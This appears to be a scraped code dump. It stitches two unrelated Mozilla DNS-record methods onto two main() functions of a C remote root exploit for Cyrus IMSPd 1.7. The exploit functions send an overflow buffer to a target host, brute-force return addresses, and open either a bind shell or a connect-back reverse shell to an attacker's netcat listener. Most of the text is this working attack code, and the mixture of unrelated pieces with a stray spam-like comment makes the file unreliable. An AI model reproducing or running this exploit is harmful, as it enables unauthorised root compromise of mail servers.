NS_IMETHODIMP nsDNSRecord::GetNextAddrAsString(nsACString &result) { PRNetAddr addr; nsresult rv = GetNextAddr(0, &addr); if (NS_FAILED(rv)) return rv; char buf[64]; if (PR_NetAddrToString(&addr, buf, sizeof(buf)) == PR_SUCCESS) { result.Assign(buf); return NS_OK; } NS_ERROR("PR_NetAddrToString failed unexpectedly"); return NS_ERROR_FAILURE; // conversion failed for some reason }
NS_IMETHODIMP nsDNSRecord::HasMore(PRBool *result) { if (mDone) *result = PR_FALSE; else { // unfortunately, NSPR does not provide a way for us to determine if // there is another address other than to simply get the next address. void *iterCopy = mIter; PRNetAddr addr; *result = NS_SUCCEEDED(GetNextAddr(0, &addr)); mIter = iterCopy; // backup iterator mDone = PR_FALSE; } return NS_OK; }
int main(int argc, char **argv) { extern char *optarg; extern int optind; char opt; char *Host = NULL; int Port = DEFAULT_PORT; int Flags = 0; int StartAddress = DEFAULT_START_ADDRESS; int TargetNumber = 0; int Sock,rootSock,i; char *EvilBuffer; int BindPort = ROOT_PORT; fprintf(stdout,"\n==[ Cyrus IMSPd 1.7 Remote Root Exploit bY SpikE ]==\n\n"); // Process arguments while ( (opt = getopt(argc,argv,"h:t:p:ba:r:")) != EOF) { switch(opt) { case 'r': BindPort = atoi(optarg); if(!BindPort) Usage(argv[0]); break; case 'h': Host = optarg; break; case 'p': Port = atoi(optarg); if(!Port) Usage(argv[0]); break; case 'b': if(Flags == 0) Flags = BRUTEFORCE; else Usage(argv[0]); break; case 'a': if( sscanf(optarg,"0x%lx",&StartAddress) != 1) Usage(argv[0]); break; case 't': TargetNumber = atoi(optarg); if(Flags == 0) Flags = TARGET; else Usage(argv[0]); break; default: Usage(argv[0]); break; } } if(Host == NULL || Flags == 0) Usage(argv[0]); // Verify target for(i=0;;i++) if(Targets[i].Name == 0) break; if(--i<TargetNumber) Usage(argv[0]); if(Flags == TARGET) fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name); fprintf(stdout,"*** Target host : %s\n",Host); fprintf(stdout,"*** Target port : %u\n",Port); fprintf(stdout,"*** Bind to port : %u\n",BindPort); if(Flags == TARGET) fprintf(stdout,"*** Target RET : %#010x\n\n",Targets[TargetNumber].Retaddr); else fprintf(stdout,"*** Bruteforce mode start : %#010x\n\n",StartAddress); switch(Flags) { case TARGET: Sock = ConectToHost(Host,Port); if(Sock == -1) fatal("Could not connect"); else fprintf(stdout,"[+] Connected\n"); fprintf(stdout,"[+] Creating evil buffer\n"); EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Retaddr,BindPort); fprintf(stdout,"[+] Sending evil buffer\n"); scanf("%d",&i); send(Sock,EvilBuffer,strlen(EvilBuffer),0); sleep(1); fprintf(stdout,"[+] Verifying ...\n"); sleep(1); if( (rootSock = VerifyXpl(Host,BindPort)) >=0) { close(Sock); free(EvilBuffer); fprintf(stdout,"[+] Yeap.. It is a root shell\n\n"); doHack(rootSock); close(rootSock); exit(0); } else fatal("No root shell. Maybe next time"); break; default: for(;;) { fprintf(stdout,"[+] Using RetAddr = %#010x\n",StartAddress); Sock = ConectToHost(Host,Port); if(Sock == -1) { // To avoid stop the bruteforce fprintf(stdout,"[+] Could not connect. Waiting...\n\n"); sleep(120); } else { fprintf(stdout,"[+] Connected\n"); fprintf(stdout,"[+] Creating evil buffer\n"); EvilBuffer = CreateEvilBuffer(StartAddress,BindPort); fprintf(stdout,"[+] Sending evil buffer\n"); send(Sock,EvilBuffer,strlen(EvilBuffer),0); sleep(1); fprintf(stdout,"[+] Verifying ...\n"); sleep(1); if( (rootSock = VerifyXpl(Host,BindPort)) >=0) { // actualite informatique close(Sock); free(EvilBuffer); fprintf(stdout,"[+] Yeap.. It is a root shell\n\n"); doHack(rootSock); close(rootSock); exit(0); } close(Sock); free(EvilBuffer); fprintf(stdout,"\n"); StartAddress = GetNextAddr(StartAddress); } } break; } free(EvilBuffer); close(Sock); }
int main(int argc, char **argv) { extern char *optarg; extern int optind; char opt; char *Host = NULL; int Port = DEFAULT_PORT; int Flags = 0; int StartAddress = DEFAULT_START_ADDRESS; int TargetNumber = 0; int Sock,rootSock,i; char *EvilBuffer; int CBackPort = 0; char Addr[20]; int IP0 = 0,IP1 = 0,IP2 = 0,IP3 = 0; char *IPPtr,*CBackPortPtr; unsigned short *PortPtr = (unsigned short *)(Shellcode+39); fprintf(stdout,"\n==[ Cyrus IMSPd 1.7 Remote Root Exploit ]==\n\n"); // Process arguments while ( (opt = getopt(argc,argv,"h:t:p:ba:r:i:")) != EOF) { switch(opt) { case 'i': if( sscanf(optarg,"%d.%d.%d.%d" ,&IP3,&IP2,&IP1,&IP0) != 4) Usage(argv[0]); IPPtr = optarg; break; case 'r': CBackPort = atoi(optarg); if(!CBackPort) Usage(argv[0]); CBackPortPtr = optarg; break; case 'h': Host = optarg; break; case 'p': Port = atoi(optarg); if(!Port) Usage(argv[0]); break; case 'b': if(Flags == 0) Flags = BRUTEFORCE; else Usage(argv[0]); break; case 'a': if( sscanf(optarg,"0x%lx",&StartAddress) != 1) Usage(argv[0]); break; case 't': TargetNumber = atoi(optarg); if(Flags == 0) Flags = TARGET; else Usage(argv[0]); break; default: Usage(argv[0]); break; } } if(Host == NULL || Flags == 0) Usage(argv[0]); if(CBackPort == 0) Usage(argv[0]); if(IP0 ==0 || IP1 == 0 || IP2 == 0 || IP3 == 0) Usage(argv[0]); // Verify target for(i=0;;i++) if(Targets[i].Name == 0) break; if(--i<TargetNumber) Usage(argv[0]); // Update shellcode Shellcode[33] = IP3; Shellcode[34] = IP2; Shellcode[35] = IP1; Shellcode[36] = IP0; *PortPtr = htons((unsigned short)CBackPort); if(Flags == TARGET) fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name); fprintf(stdout,"*** Target host : %s\n",Host); fprintf(stdout,"*** Target port : %u\n",Port); fprintf(stdout,"*** IP to connect back : %u.%u.%u.%u\n" ,IP3,IP2,IP1,IP0); fprintf(stdout,"*** Port to connect back : %u\n",CBackPort); if(Flags == TARGET) fprintf(stdout,"*** Target RET : %#010x\n\n",Targets[TargetNumber].Retaddr); else fprintf(stdout,"*** Bruteforce mode start : %#010x\n\n",StartAddress); switch(Flags) { case TARGET: Sock = ConectToHost(Host,Port); if(Sock == -1) fatal("Could not connect"); else fprintf(stdout,"[+] Connected\n"); fprintf(stdout,"[+] Creating evil buffer\n"); EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Retaddr); fprintf(stdout,"[+] Sending evil buffer\n"); send(Sock,EvilBuffer,strlen(EvilBuffer),0); sleep(1); fprintf(stdout,"[+] Wait for root shell on your netcat\n\n"); break; default: for(;;) { fprintf(stdout,"[+] Using RetAddr = %#010x\n",StartAddress); Sock = ConectToHost(Host,Port); if(Sock == -1) { // To avoid stop bruteforce fprintf(stdout,"[-] Error. Restarting ...\n\n"); sleep(1); sprintf(Addr,"%#010x",StartAddress); execl(argv[0],argv[0],"-h",Host,"-b","-a",Addr,"-i",IPPtr,"-r",CBackPortPtr,0); } else { fprintf(stdout,"[+] Connected\n"); fprintf(stdout,"[+] Creating evil buffer\n"); EvilBuffer = CreateEvilBuffer(StartAddress); fprintf(stdout,"[+] Sending evil buffer\n"); send(Sock,EvilBuffer,strlen(EvilBuffer),0); sleep(1); close(Sock); free(EvilBuffer); fprintf(stdout,"\n"); StartAddress = GetNextAddr(StartAddress); } } break; } free(EvilBuffer); close(Sock); }